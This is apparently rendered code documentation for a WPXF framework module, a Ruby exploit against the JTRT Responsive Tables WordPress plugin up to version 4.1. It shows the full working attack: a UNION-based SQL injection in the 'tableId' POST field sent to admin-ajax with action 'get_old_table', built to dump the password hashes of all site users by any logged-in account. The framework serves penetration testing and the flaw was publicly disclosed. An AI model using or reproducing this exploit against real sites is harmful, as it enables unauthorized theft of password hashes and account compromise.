class Wpxf::Auxiliary::JtrtResponsiveTablesHashDump
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::HashDump::new
# File lib/wpxf/modules/auxiliary/hash_dump/jtrt_responsive_tables_hash_dump.rb, line 6 def initialize super update_info( name: 'JTRT Responsive Tables <= 4.1 Authenticated Hash Dump', desc: %( JTRT Responsive Tables <= 4.1 suffers from an SQL injection vulnerability which is exploitable by registered users of any level. This module utilises the vulnerability to dump the hashed passwords of all users in the database. ), author: [ 'Lenon Leite', # Disclosure 'rastating' # WPXF module ], references: [ ['WPVDB', '8953'], ['URL', 'http://lenonleite.com.br/en/blog/2017/09/11/jtrt-responsive-tables-wordpress-plugin-sql-injection/'] ], date: 'Nov 11 2017' ) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/jtrt_responsive_tables_hash_dump.rb, line 30 def check check_plugin_version_from_readme('jtrt-responsive-tables', '4.1.1') end
hashdump_number_of_cols()
click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/jtrt_responsive_tables_hash_dump.rb, line 62 def hashdump_number_of_cols 5 end
hashdump_request_body()
click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/jtrt_responsive_tables_hash_dump.rb, line 52 def hashdump_request_body { 'tableId' => "-#{Utility::Text.rand_numeric(2)} UNION #{hashdump_sql_statement} #" } end
hashdump_request_method()
click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/jtrt_responsive_tables_hash_dump.rb, line 42 def hashdump_request_method :post end
hashdump_request_params()
click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/jtrt_responsive_tables_hash_dump.rb, line 46 def hashdump_request_params { 'action' => 'get_old_table' } end
hashdump_visible_field_index()
click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/jtrt_responsive_tables_hash_dump.rb, line 58 def hashdump_visible_field_index 2 end
requires_authentication()
click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/jtrt_responsive_tables_hash_dump.rb, line 34 def requires_authentication true end
reveals_one_row_per_request()
click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/jtrt_responsive_tables_hash_dump.rb, line 38 def reveals_one_row_per_request true end
vulnerable_url()
click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/jtrt_responsive_tables_hash_dump.rb, line 66 def vulnerable_url wordpress_url_admin_ajax end